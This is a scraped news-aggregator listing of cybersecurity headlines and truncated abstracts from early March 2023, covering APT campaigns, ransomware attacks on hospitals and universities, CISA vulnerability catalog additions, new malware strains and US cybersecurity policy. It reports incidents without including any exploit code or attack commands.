The North Korea-linked Lazarus Group has been observed weaponizing flaws in an undisclosed software to breach a financial business entity in South Korea twice within a span of a year. While the first attack in May 2022 entailed the use of a vulnerable version of a certificate software that's widely used by public institutions and universities, the re-infiltration in October 2022 involved the exploitation of a zero-day in the same program. Cybersecurity firm AhnLab Security Emergency Response Center (ASEC) said it's refraining from mentioning the software owing to the fact that "the vulnerability has not been fully verified yet and a software patch has not been released." The adversarial collective, after obtaining an initial foothold by an unknown method, abused the zero-day bug to perform lateral movement, shortly after which the AhnLab V3 anti-malware engine was disabled via a BYOVD attack . It's worth noting here that the Bring Your Own Vulnerable DrThe Hacker News
March 8, 2023 – APT
North Korea-linked Lazarus APT used a 0-day in a recent attack Full Text
Abstract
North Korea-linked Lazarus APT group exploits a zero-day vulnerability in attacks aimed at a South Korean financial entity. ASEC (AhnLab Security Emergency Response Center) observed North Korea-linked Lazarus APT group exploiting a zero-day vulnerability...Security Affairs
March 8, 2023 – Breach
Netherlands: Qilin Ransomware Breaches Elderly Care Facility and Leaks Confidential Data Online Full Text
Abstract
The attack occurred on February 17, causing technical difficulties for the facility. The care institution announced the breach via its website and attributed the problem to a group that had gained unauthorized access to its network.Cyware
March 08, 2023 – Attack
Sharp Panda Using New Soul Framework Version to Target Southeast Asian Governments Full Text
Abstract
High-profile government entities in Southeast Asia are the target of a cyber espionage campaign undertaken by a Chinese threat actor known as Sharp Panda since late last year. The intrusions are characterized by the use of a new version of the Soul modular framework, marking a departure from the group's attack chains observed in 2021. Israeli cybersecurity company Check Point said the "long-running" activities have historically singled out countries such as Vietnam, Thailand, and Indonesia. Sharp Panda was first documented by the firm in June 2021, describing it as a "highly-organized operation that placed significant effort into remaining under the radar." Interestingly, the use of the Soul backdoor was detailed by Broadcom's Symantec in October 2021 in connection to an unattributed espionage operation targeting defense, healthcare, and ICT sectors in Southeast Asia. The implant's origins, according to research published by Fortinet FortiGThe Hacker News
March 8, 2023 – Government
CISA adds three new bugs to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added actively exploited flaws in Teclib GLPI, Apache Spark, and Zoho ManageEngine ADSelfService Plus to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities...Security Affairs
March 8, 2023 – Attack
Update: Israel blames state-sponsored Iranian hackers for ransomware attack on university Full Text
Abstract
The attack in February forced the Israel Institute of Technology (Technion) to postpone exams and shut down its IT systems. The incident followed what Israeli defense officials said were dozens of attempted Iranian cyberattacks over the past year.Cyware
March 08, 2023 – Government
CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. The list of vulnerabilities is below - CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability CVE-2022-28810 (CVSS score: 6.8) - Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability The most critical of the three is CVE-2022-35914 , which concerns a remote code execution vulnerability in the third-party library htmlawed present in Teclib GLPI , an open source asset and IT management software package. The exact specifics surrounding the nature of attacks are unknown, but the Shadowserver Foundation in October 2022 noted that it has seen exploitation attempts against its honeypots. Since then, a cURL-based one-line proof of concept (PoC) has been made aThe Hacker News
March 8, 2023 – APT
China-linked APT Sharp Panda targets government entities in Southeast Asia Full Text
Abstract
China-linked APT group Sharp Panda targets high-profile government entities in Southeast Asia with the Soul modular framework. CheckPoint researchers observed in late 2022, a campaign attributed to the China-linked APT group Sharp Panda that is targeting...Security Affairs
March 8, 2023 – Government
US Senators Aim to Block Foreign Tech That Poses Threat Full Text
Abstract
Analysis in 2021 by The Citizen Lab concluded that TikTok collects types of data similar to what other social media platforms collect - and also said that "the general privacy standards for social platforms is not a high bar."Cyware
March 8, 2023 – Vulnerabilities
VMware NSX Manager bugs actively exploited in the wild since December Full Text
Abstract
Security researchers warn of hacking attempts in the wild exploiting critical vulnerabilities in VMware NSX Manager. Cyber security firm Wallarm is warning of ongoing attacks exploiting the critical flaws, tracked as CVE-2021-39144 (CVSS score of 9.8)...Security Affairs
March 8, 2023 – Outage
Northern Essex Community College Remains Shuttered After Cyberattack Full Text
Abstract
A spokesperson for the school told The Record that they did not know if the attack was ransomware, and claimed they “do not have evidence of any personal data being compromised.” On Tuesday, the school confirmed it would not open for the day.Cyware
March 8, 2023 – Vulnerabilities
Chrome 111 Patches 40 Vulnerabilities Full Text
Abstract
A total of 24 of the addressed security defects were reported by external researchers. These include eight high-severity flaws, 11 medium-severity bugs, and five low-severity issues.Cyware
March 8, 2023 – Vulnerabilities
Vulnerability in Toyota Management Platform Provided Access to Customer Data Full Text
Abstract
A severe vulnerability in the Toyota Customer 360 customer relationship management (CRM) platform allowed a security researcher to access the personal information of the car maker’s customers in Mexico.Cyware
March 7, 2023 – Malware
New SYS01stealer Threat Uses Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Morphisec has tracked an advanced info-stealer called SYS01stealer since November 2022. It uses similar lures and loading techniques to another information stealer recently named S1deload by Bitdefender, but the actual payload is different.Cyware
March 07, 2023 – Malware
SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors. "The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News. "The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information." The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler. However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actorsThe Hacker News
March 7, 2023 – General
Combating Ransomware: A Roadmap for Progress Full Text
Abstract
A new white paper from American University Washington College of Law’s Technology, Law, and Security Program considers how to combat the evolving ransomware threat in line with the Biden administration’s new National Cybersecurity Strategy.Lawfare
March 7, 2023 – Attack
SYS01 stealer targets critical government infrastructure Full Text
Abstract
Researchers discovered a new info stealer dubbed SYS01 stealer targeting critical government infrastructure and manufacturing firms. Cybersecurity researchers from Morphisec discovered a new, advanced information stealer, dubbed SYS01 stealer,...Security Affairs
March 7, 2023 – Criminals
Vice Society Ransomware Group Claims Hamburg University of Applied Sciences as Latest Victim Full Text
Abstract
The university warned that “significant amounts of data from various areas” were copied, including usernames and “cryptographically secured” passwords, email addresses, and mobile phone numbers.Cyware
March 07, 2023 – Hacker
Transparent Tribe Hackers Distribute CapraRAT via Trojanized Messaging Apps Full Text
Abstract
A suspected Pakistan-aligned advanced persistent threat (APT) group known as Transparent Tribe has been linked to an ongoing cyber espionage campaign targeting Indian and Pakistani Android users with a backdoor called CapraRAT . "Transparent Tribe distributed the Android CapraRAT backdoor via trojanized secure messaging and calling apps branded as MeetsApp and MeetUp," ESET said in a report shared with The Hacker News. As many as 150 victims, likely with military or political leanings, are estimated to have been targeted, with the malware ( com.meetup.app ) available to download from fake websites that masquerade as the official distribution centers of these apps. It's being suspected that the targets are lured through a honeytrap romance scam wherein the threat actor approaches the victims via another platform and persuades them to install the malware-laced apps under the pretext of "secure" messaging and calling. However, the apps, besides offeringThe Hacker News
March 7, 2023 – Breach
Acer discloses a new data breach, 160 GB of sensitive data available for sale Full Text
Abstract
Taiwanese multinational hardware and electronics corporation Acer discloses a data breach after a threat actor claimed the hack of the company. Recently a threat actor announced the availability for sale of 160 GB of data allegedly stolen...Security Affairs
March 7, 2023 – Hacker
Transparent Tribe Lures Indian and Pakistani Officials With Romance Scam to Spread Malware Full Text
Abstract
ESET researchers have identified an active Transparent Tribe campaign, targeting mostly Indian and Pakistani Android users – presumably with a military or political orientation.Cyware
March 07, 2023 – General
Why Healthcare Can’t Afford to Ignore Digital Identity Full Text
Abstract
Investing in digital identity can improve security, increase clinical productivity, and boost healthcare's bottom line. — b y Gus Malezis, CEO of Imprivata Digitalization has created immeasurable opportunities for businesses over the past two decades. But the growth of hybrid work and expansion of Internet of Things (IoT) has outpaced traditional 'castle and moat' cybersecurity, introducing unprecedented vulnerabilities, especially in the healthcare industry. Although all organizations have important data to secure, healthcare holds some of the public's most sensitive personal health information (PHI) – not to mention insurance and financial data, as well. We all expect this information to be secured and protected, especially with HIPAA laws in place. However, due to increasing IT fragmentation and the growing sophistication of cyberattacks, this is no longer guaranteed. In fact, the number of individuals affected by health data breaches in the U.S. since 2009 isThe Hacker News
March 7, 2023 – Malware
Expert released PoC exploit code for critical Microsoft Word RCE flaw Full Text
Abstract
Security researcher released a proof-of-concept exploit code for a critical flaw, tracked as CVE-2023-21716, in Microsoft Word. Security researcher Joshua Drake released a proof-of-concept for a critical vulnerability, tracked as CVE-2023-21716 (CVSS...Security Affairs
March 7, 2023 – Vulnerabilities
Android’s March 2023 Updates Patch Over 50 Vulnerabilities Full Text
Abstract
The most severe of the patched vulnerabilities are two remote code execution (RCE) flaws in the System component, both of which were addressed as part of the 2023-03-01 security patch level.Cyware
March 07, 2023 – Malware
Shein’s Android App Caught Transmitting Clipboard Data to Remote Servers Full Text
Abstract
An older version of Shein's Android application suffered from a bug that periodically captured and transmitted clipboard contents to a remote server. The Microsoft 365 Defender Research Team said it discovered the problem in version 7.9.2 of the app that was released on December 16, 2021. The issue has since been addressed as of May 2022. Shein, originally named ZZKKO, is a Chinese online fast fashion retailer based in Singapore. The app, which is currently at version 9.0.0, has over 100 million downloads on the Google Play Store. The tech giant said it's not "specifically aware of any malicious intent behind the behavior," but noted that the function isn't necessary to perform tasks on the app. It further pointed out that launching the application after copying any content to the device clipboard automatically triggered an HTTP POST request containing the data to the server "api-service[.]shein[.]com." To mitigate such privacy risks, GooThe Hacker News
March 7, 2023 – Insider Threat
LastPass hack caused by an unpatched Plex software on an employee’s PC Full Text
Abstract
The LastPass data breach was caused by the failure to update Plex on the home computer of one of the company updates. The security breach suffered by LastPass was caused by the failure to update Plex on the home computer of one of its engineers. Recently,...Security Affairs
March 7, 2023 – General
Exploitation of Critical Vulnerability in End-of-Life VMware Product Ongoing Full Text
Abstract
Tracked as CVE-2021-39144 (CVSS score of 9.8), the issue was disclosed in October 2022, when VMware announced patches for it, although the affected product had reached end-of-life (EOL) status in January 2022.Cyware
March 07, 2023 – Breach
LastPass Hack: Engineer’s Failure to Update Plex Software Led to Massive Data Breach Full Text
Abstract
The massive breach at LastPass was the result of one of its engineers failing to update Plex on their home computer, in what's a sobering reminder of the dangers of failing to keep software up-to-date. The embattled password management service last week revealed how unidentified actors leveraged information stolen from an earlier incident that took place prior to August 12, 2022, along with details "available from a third-party data breach and a vulnerability in a third-party media software package to launch a coordinated second attack" between August and October 2022. The intrusion ultimately enabled the adversary to steal partially encrypted password vault data and customer information. The second attack specifically singled out one of the four DevOps engineers, targeting their home computer with a keylogger malware to obtain the credentials and breach the cloud storage environment. This, in turn, is said to have been made possible by exploiting a nearly three-yThe Hacker News
March 7, 2023 – Breach
Hacker Claims to Sell 160GB Trove of Stolen Confidential Data From Acer Full Text
Abstract
The list of stolen data included confidential slides and presentations, technical manuals, Windows Imaging Format files, binaries of various types, backend infrastructure data, product model documentation, and information about various devices.Cyware
March 7, 2023 – Attack
RansomHouse Ransomware Attack Hit Hospital Clinic de Barcelona Full Text
Abstract
“The hospital’s press department said that all written work was being done on paper and that the hospital was diverting new urgent cases to other hospitals in the city,” states the Associated Press.Cyware
March 6, 2023 – APT
After Clasiopa, APT41 Targets Asian Materials Sector Full Text
Abstract
Symantec warned against the Chinese state-sponsored Winnti, aka APT41 and Blackfly, hacker group targeting two subsidiaries of an Asian conglomerate in the materials sector. The operation ran from late 2022 to early 2023, with a focus on intellectual property theft. Symantec has provided IOCs to de ... Read MoreCyware
March 06, 2023 – Malware
New HiatusRAT Malware Targets Business-Grade Routers to Covertly Spy on Victims Full Text
Abstract
A never-before-seen complex malware is targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America at least since July 2022. The elusive campaign, dubbed Hiatus by Lumen Black Lotus Labs, has been found to deploy two malicious binaries, a remote access trojan dubbed HiatusRAT and a variant of tcpdump that makes it possible to capture packet capture on the target device. "Once a targeted system is infected, HiatusRAT allows the threat actor to remotely interact with the system, and it utilizes prebuilt functionality [...] to convert the compromised machine into a covert proxy for the threat actor," the company said in a report shared with The Hacker News. "The packet-capture binary enables the actor to monitor router traffic on ports associated with email and file-transfer communications." The threat cluster primarily singles out end-of-life (EoL) DrayTek Vigor router models 2960 and 3900, with approximately 100The Hacker News
March 6, 2023 – Policy and Law
Where the New National Cybersecurity Strategy Differs From Past Practice Full Text
Abstract
Although the strategy builds on cybersecurity efforts from the previous three administrations, it departs from past perspectives and practices and, if fully implemented, has the potential to change the U.S. cybersecurity posture significantly for the better.Lawfare
March 6, 2023 – Attack
Ransom House ransomware attack hit Hospital Clinic de Barcelona Full Text
Abstract
Hospital Clinic de Barcelona, one of the main hospitals in the Spanish city, suffered a cyber attack that crippled its computer system. On Sunday, a ransomware attack hit the Hospital Clinic de Barcelona, one of the main hospitals of the Catalan city....Security Affairs
March 6, 2023 – Phishing
Digital Smoke: Massive Investment Fraud Scam Full Text
Abstract
Resecurity identified Digital Smoke, one of the largest investment scam networks, that has been defrauding netizens mostly from Europe, Asia, and Australia. The attackers impersonate Fortune 100 firms from the U.S. and the U.K. Most of the fraudulent schemes pertained to financial services, EV and ... Read MoreCyware
March 06, 2023 – Deepfake
From Disinformation to Deep Fakes: How Threat Actors Manipulate Reality Full Text
Abstract
Deep fakes are expected to become a more prominent attack vector. Here's how to identify them. What are Deep Fakes? A deep fake is the act of maliciously replacing real images and videos with fabricated ones to perform information manipulation. To create images, video and audio that are high quality enough to be used in deep fakes, AI and ML are required. Such use of AI, ML and image replacement are unlike other types of information manipulation, which use less extreme manipulation techniques, like misrepresentation of information, isolating parts of the information or editing it in a deceptive manner. Etay Maor, Senior Director of Security Strategy at Cato Networks adds "To add complications, the recent advancements and accessibility to AI generated text, such as GPT3, have already been used in combination with deepfakes (as a proof of concept) to create interactive, human looking conversation bots" What Do Deep Fakes Look Like? Deep fakes come in all shapes and sizThe Hacker News
March 6, 2023 – Criminals
European police dismantled the DoppelPaymer ransomware gang Full Text
Abstract
German police announced to have dismantled an international cybercrime gang behind the DoppelPaymer ransomware operation. Europol has announced that an international operation conducted by law enforcement in Germany and Ukraine, with help of the US FBI and the Dutch...Security Affairs
March 6, 2023 – Phishing
Multi-Year Spearphihing Campaign Against Maritime Industry Full Text
Abstract
EclecticIQ has revealed that a single connected threat cluster is most likely behind an attack campaign targeting the maritime industry with spearphishing emails to distribute different malware threats. In July 2022, the campaign shifted from Agent Tesla to Formbook using CAB file attachments. Howe ... Read MoreCyware
March 06, 2023 – Criminals
Core Members of DoppelPaymer Ransomware Gang Targeted in Germany and Ukraine Full Text
Abstract
Law enforcement authorities from Germany and Ukraine have targeted suspected core members of a cybercrime group that has been behind large-scale attacks using DoppelPaymer ransomware. The operation, which took place on February 28, 2023, was carried out with support from the Dutch National Police (Politie) and the U.S. Federal Bureau of Investigation (FBI), according to Europol. This encompassed a raid of a German national's house as well as searches in the Ukrainian cities of Kiev and Kharkiv. A Ukrainian national was also interrogated. Both individuals are believed to have taken up crucial positions in the DoppelPaymer group. "Forensic analysis of the seized equipment is still ongoing to determine the exact role of the suspects and their links to other accomplices," the agency further said . DoppelPaymer , according to cybersecurity firm CrowdStrike, emerged in April 2019 and shares most of its code with another ransomware strain known as BitPaymer, which is attriThe Hacker News
March 6, 2023 – Government
US government orders States to conduct cyber security audits of public water systems Full Text
Abstract
The US government urges cyber security audits of public water systems, highlighting the importance to secure US critical infrastructure. The Biden administration announced on Friday that it will make it mandatory for the states to conduct cyber security...Security Affairs
March 6, 2023 – Ransomware
LockBit Introduces New Method to Bypass MOTW Protection Full Text
Abstract
Researchers uncovered a new LockBit ransomware campaign last December and January using a novel technique involving the use of a .img container to bypass the Mark of The Web (MOTW) protection mechanism. LockBit remained one of the most active ransomware families in successful RaaS and extortion att ... Read MoreCyware
March 06, 2023
Experts Reveal Google Cloud Platform’s Blind Spot for Data Exfiltration Attacks Full Text
Abstract
Malicious actors can take advantage of "insufficient" forensic visibility into Google Cloud Platform (GCP) to exfiltrate sensitive data, a new research has found. "Unfortunately, GCP does not provide the level of visibility in its storage logs that is needed to allow any effective forensic investigation, making organizations blind to potential data exfiltration attacks," cloud incident response firm Mitiga said in a report. The attack banks on the prerequisite that the adversary is able to gain control of an identity and access management (IAM) entity in the targeted organization by methods like social engineering to access the GCP environment. The crux of the problem is that GCP's storage access logs do not provide adequate transparency with regards to potential file access and read events, instead grouping them all as a single "Object Get" activity. "The same event is used for a wide variety of types of access, including: Reading a filThe Hacker News
March 6, 2023 – Breach
Hatch Bank data breach caused by the exploitation of the GoAnywhere MFT zero-day Full Text
Abstract
Fintech platform Hatch Bank disclosed a data breach, hackers exploited a recently discovered zero-day in Fortra GoAnywhere MFT secure file-sharing platform. Hatch Bank is a fintech firm that provides services to other fintech companies. The company...Security Affairs
March 6, 2023 – Malware
New Feature-Rich Post-Exploitation Tool ‘Exfiltrator-22’ Linked With LockBit Full Text
Abstract
Hackers in the underground marketplace have introduced a new Exfiltrator-22, or EX-22, post-exploitation framework. According to the CYFIRMA team, LockBit 3.0 affiliates or its members are most probably behind its development. The developers have used the same C2 infrastructure previously exposed i ... Read MoreCyware
March 06, 2023 – Encryption
Experts Discover Flaw in U.S. Govt’s Chosen Quantum-Resistant Encryption Algorithm Full Text
Abstract
A group of researchers has revealed what it says is a vulnerability in a specific implementation of CRYSTALS-Kyber , one of the encryption algorithms chosen by the U.S. government as quantum-resistant last year. The exploit relates to "side-channel attacks on up to the fifth-order masked implementations of CRYSTALS-Kyber in ARM Cortex-M4 CPU," Elena Dubrova, Kalle Ngo, and Joel Gärtner of KTH Royal Institute of Technology said in a paper. CRYSTALS-Kyber is one of four post-quantum algorithms selected by the U.S. National Institute of Standards and Technology (NIST) after a rigorous multi-year effort to identify the next-generation encryption standards that can withstand huge leaps in computing power. A side-channel attack, as the name implies, involves extracting secrets from a cryptosystem through measurement and analysis of physical parameters. Some examples of such parameters include supply current, execution time, and electromagnetic emission. The underlying idThe Hacker News
March 6, 2023 – Malware
Colour-Blind, a fully featured info stealer and RAT in PyPI Full Text
Abstract
Experts discovered a fully featured information stealer, tracked as 'Colour-Blind' in the Python Package Index (PyPI). Researchers from Kroll's Cyber Threat Intelligence team discovered a malicious Python package uploaded to the Python Package Index...Security Affairs
March 6, 2023 – General
Vulnerabilities of years past haunt organizations, aid attackers Full Text
Abstract
According to a Tenable report, the number one group of most frequently exploited vulnerabilities represents a large pool of known vulnerabilities, some of which were originally disclosed as far back as 2017.Cyware
March 6, 2023 – Vulnerabilities
RIG EK Achieves Lifetime High Success Rate with Old IE Bugs Full Text
Abstract
RIG EK continues to make its mark as a successful exploit kit as it attempted to make roughly 2,000 intrusions daily, with the highest attack success rate of its lifetime of 30%. By exploiting relatively old Internet Explorer vulnerabilities, the exploit kit has been seen distributing various types ... Read MoreCyware
March 6, 2023 – General
Tracking device technology: A double-edged sword for CISOs Full Text
Abstract
Tracking devices are a boon to organizations with vast logistical operations and anyone who has ever lost a set of car keys. But trackers can also be a nightmare for cybersecurity, opening up a whole new world of opportunity for intruders.Cyware
March 6, 2023 – General
Attackers are developing and deploying exploits faster than ever Full Text
Abstract
While there was a reduction in the widespread exploitation of new vulnerabilities in 2022, the risk remains significant as broad and opportunistic attacks continue to pose a threat, according to Rapid7.Cyware
March 6, 2023 – General
Municipal CISOs grapple with challenges as cyber threats soar Full Text
Abstract
Municipal CISOs grapple with challenges as they become targets for nation-state threat actors, cope with regulations, and pursue funding from resource-constrained governments.Cyware
March 5, 2023 – Attack
Credential Stuffing attack on Chick-fil-A impacted +71K users Full Text
Abstract
American fast-food restaurant chain Chick-fil-A reported that the accounts of over 71K users were compromised as a result of a credential stuffing campaign. The American fast-food restaurant chain Chick-fil-A notified over 71K users that their accounts...Security Affairs
March 5, 2023 – Breach
Play Ransomware gang has begun to leak data stolen from City of Oakland Full Text
Abstract
The Play ransomware gang has finally begun to leak the data stolen from the City of Oakland in a recent attack. The Play ransomware gang has begun to leak data they have stolen from the City of Oakland (California) in a recent cyberattack. Oakland...Security Affairs
March 4, 2023 – Breach
Thousands of Websites Hijacked Using Compromised FTP Credentials Full Text
Abstract
In many cases, the attackers managed to obtain highly secure auto-generated FTP credentials and used them to hijack the victim websites to redirect visitors to adult-themed content.Cyware
March 04, 2023 – General
Security and IT Teams No Longer Need To Pay For SaaS-Shadow IT Discovery Full Text
Abstract
This past January, a SaaS Security Posture Management (SSPM) company named Wing Security (Wing) made waves with the launch of its free SaaS-Shadow IT discovery solution . Cloud-based companies were invited to gain insight into their employees' SaaS usage through a completely free, self-service product that operates on a "freemium" model. If a user is impressed with the solution and wants to gain more insights or take remediation action, they can purchase the enterprise solution. "In today's economic reality, security budgets have not necessarily been cut down, but buyers are far more careful in their purchasing decisions and rightfully so. We believe that you cannot secure what you do not know, so knowing should be a basic commodity. Once you understand the magnitude of your SaaS attack layer, you can make an educated decision as to how you are going to solve it. Discovery is the natural and basic first step and it should be accessible to anyone." said GaThe Hacker News
March 4, 2023 – Attack
Southeastern Louisiana University ‘Likely’ Suffered Cyber Attack Full Text
Abstract
Southeastern Louisiana University suffered a week-long outage of its website, email, or system for submitting assignments after a "potential incident" last week caused the university to shut down its network.Cyware
March 04, 2023 – Malware
New FiXS ATM Malware Targeting Mexican Banks Full Text
Abstract
A new ATM malware strain dubbed FiXS has been observed targeting Mexican banks since the start of February 2023. "The ATM malware is hidden inside another not-malicious-looking program," Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Besides requiring interaction via an external keyboard, the Windows-based ATM malware is also vendor-agnostic and is capable of infecting any teller machine that supports CEN/XFS (short for eXtensions for Financial Services). The exact mode of compromise remains unknown but Metabase Q's Dan Regalado told The Hacker News that it's likely that "attackers found a way to interact with the ATM via touchscreen." FiXS is also said to be similar to another strain of ATM malware codenamed Ploutus that has enabled cybercriminals to extract cash from ATMs by using an external keyboard or by sending an SMS message . One of the notable characteristics of FiXS is its ability to dispThe Hacker News
March 4, 2023 – Government
The U.S. CISA and FBI warn of Royal ransomware operation Full Text
Abstract
The FBI and the CISA released a joint Cybersecurity Advisory to provide organizations, tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family.Cyware
March 4, 2023 – General
Security Affairs newsletter Round 409 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. FiXS,...Security Affairs
March 4, 2023 – Malware
FiXS, a new ATM malware that is targeting Mexican banks Full Text
Abstract
Researchers at Metabase Q discovered a new ATM malware, dubbed FiXS, that was employed in attacks against Mexican banks since February 2023. Researchers at Metabase Q recently spotted a new ATM malware, dubbed FiXS, that is currently targeting Mexican...Security Affairs
March 4, 2023 – Breach
BidenCash leaks 2.1M stolen credit/debit cards Full Text
Abstract
The dark web carding site BidenCash recently leaked for free a collection of approximately 2 million stolen payment card numbers. An archive containing 2.1 million stolen payment card numbers is available for free to commemorate the anniversary of the dark...Security Affairs
March 3, 2023 – Government
CISA Releases Decider Tool to Help with MITRE ATT&CK Mapping Full Text
Abstract
Decider makes the mapping process easier by asking the user a series of questions about the adversary’s activity in their network. The tool also provides search and filtering functionality, and allows users to export the results to common formats.Cyware
March 03, 2023 – Vulnerabilities
New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices Full Text
Abstract
A pair of serious security defects has been disclosed in the Trusted Platform Module ( TPM ) 2.0 reference library specification that could potentially lead to information disclosure or privilege escalation. One of the vulnerabilities, CVE-2023-1017 , concerns an out-of-bounds write, while the other, CVE-2023-1018 , is described as an out-of-bounds read. Credited with discovering and reporting the issues in November 2022 is cybersecurity company Quarkslab. "These vulnerabilities can be triggered from user-mode applications by sending malicious commands to a TPM 2.0 whose firmware is based on an affected TCG reference implementation," the Trusted Computing Group (TCG) said in an advisory. Large tech vendors, organizations using enterprise computers, servers, IoT devices, and embedded systems that include a TPM can be impacted by the flaws, Quarkslab noted , adding they "could affect billions of devices." TPM is a hardware-based solution (i.e., a crypto-proThe Hacker News
March 3, 2023 – General
Cybersecurity’s Third Rail: Software Liability Full Text
Abstract
The Biden administration’s cybersecurity strategy calls for placing responsibility for buggy software on those best positioned to reduce risk. It’s high time, but it won’t be easy.Lawfare
March 3, 2023 – Privacy
Pegasus spyware used to spy on a Polish mayor Full Text
Abstract
The phone of an opposition-linked Polish mayor was infected with the powerful Pegasus spyware, local media reported. Reuters reported that the phone of an opposition-linked Polish mayor was infected with the Pegasus spyware. According to rumors, the Polish...Security Affairs
March 3, 2023 – Breach
Vice Society publishes data stolen during Vesuvius ransomware attack Full Text
Abstract
The Vice Society ransomware gang has published on the dark web files that it stole from Vesuvius, one month after the company announced that it had suffered a “cyber incident.”Cyware
March 03, 2023 – Hacker
Chinese Hackers Targeting European Entities with New MQsTTang Backdoor Full Text
Abstract
The China-aligned Mustang Panda actor has been observed using a hitherto unseen custom backdoor called MQsTTang as part of an ongoing social engineering campaign that commenced in January 2023. "Unlike most of the group's malware, MQsTTang doesn't seem to be based on existing families or publicly available projects," ESET researcher Alexandre Côté Cyr said in a new report. Attack chains orchestrated by the group have stepped up targeting of European entities in the wake of Russia's full-scale invasion of Ukraine last year. The victimology of the current activity is unclear, but the Slovak cybersecurity company said the decoy filenames are in line with the group's previous campaigns that target European political organizations. That said, ESET also observed attacks against unknown entities in Bulgaria and Australia, as well as a governmental institution in Taiwan, indicating focus on Europe and Asia. Mustang Panda has a history of using a remoteThe Hacker News
March 3, 2023 – Government
The Biden-Harris Administration Releases New National Cybersecurity Strategy Full Text
Abstract
The long-awaited National Cybersecurity Strategy seeks to make fundamental changes to underlying dynamics of the digital ecosystem.Lawfare
March 3, 2023 – Attack
Hundreds of thousands of websites hacked as part of redirection campaign Full Text
Abstract
Thousands of Websites Hijacked Using Compromised FTP Credentials Researchers reported that threat actors compromised thousands of websites using legitimate FTP credentials to hijack traffic. Cybersecurity firm Wiz reported that since early September...Security Affairs
March 3, 2023 – Malware
Mustang Panda’s Latest ‘MQsTTang’ Backdoor Treads New Ground With Qt and MQTT Full Text
Abstract
This backdoor is part of an ongoing campaign that researchers can trace back to early January 2023. Unlike most of the group’s malware, MQsTTang doesn’t seem to be based on existing families or publicly available projects.Cyware
March 03, 2023 – Government
U.S. Cybersecurity Agency Raises Alarm Over Royal Ransomware’s Deadly Capabilities Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a new advisory about Royal ransomware , which emerged in the threat landscape last year. "After gaining access to victims' networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems," CISA said . The custom ransomware program , which has targeted U.S. and international organizations since September 2022, is believed to have evolved from earlier iterations that were dubbed Zeon. What's more, it's said to be operated by seasoned threat actors who used to be part of Conti Team One, cybersecurity company Trend Micro disclosed in December 2022. The ransomware group employs call back phishing as a means of delivering their ransomware to victims, a technique widely adopted by criminal groups that splintered from the Conti enterprise last year following its shutdown. Other modes ofThe Hacker News
March 3, 2023 – APT
MQsTTang, a new backdoor used by Mustang Panda APT against European entities Full Text
Abstract
China-Linked Mustang Panda APT employed MQsTTang backdoor as part of an ongoing campaign targeting European entities. China-linked Mustang Panda APT group has been observed using a new backdoor, called MQsTTang, in attacks aimed at European...Security Affairs
March 3, 2023 – Attack
Poland Blames Russian Hackers for Cyberattack on Tax Service Website Full Text
Abstract
The distributed denial-of-service (DDoS) attack occurred on Tuesday, causing the website to crash for approximately one hour and blocking users’ access to the online tax filing system.Cyware
March 3, 2023 – Vulnerabilities
Trusted Platform Module (TPM) 2.0 flaws could impact billions of devices Full Text
Abstract
Two vulnerabilities affecting the Trusted Platform Module (TPM) 2.0 library could potentially lead to information disclosure or privilege escalation. The Trusted Computing Group (TCG) is warning of two vulnerabilities affecting the implementations...Security Affairs
March 3, 2023 – Policy and Law
US Cybersecurity Strategy Shifts Liability Issues to Vendors Full Text
Abstract
A new federal strategy to make manufacturers liable for insecure software requires an attainable safe harbor policy and could be a disincentive for them in sharing important vulnerability info with the government, according to industry observers.Cyware
March 3, 2023 – Government
The U.S. CISA and FBI warn of Royal ransomware operation Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of the capabilities of the recently emerged Royal ransomware. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded...Security Affairs
March 3, 2023 – Attack
Cryptojacking Campaign Targets Insecure Deployments of Redis Servers Full Text
Abstract
Cado Labs researchers recently discovered a new cryptojacking campaign targeting insecure deployments of Redis database servers. Threat actors behind this campaign used the free and open source command line file transfer service transfer.sh.Cyware
March 3, 2023 – Breach
Retailer WH Smith discloses data breach after a cyberattack Full Text
Abstract
Retailer WH Smith disclosed a data breach following a cyber attack, threat actors had access to access company data. Retailer WH Smith revealed that threat actors have breached its infrastructure and had access to the data of about 12,500 current...Security Affairs
March 3, 2023 – Policy and Law
Nigerian Citizen Gets 11-Year US Federal Sentence for Global BEC Scam Full Text
Abstract
A leader of an international crime network that attempted to launder more than $25 million in fraudulently obtained funds, including through business email compromise, received a sentence of more than a decade in prison.Cyware
March 3, 2023 – Breach
Information of European Hotel Chain’s Customers Found on Unprotected Elasticsearch Server Full Text
Abstract
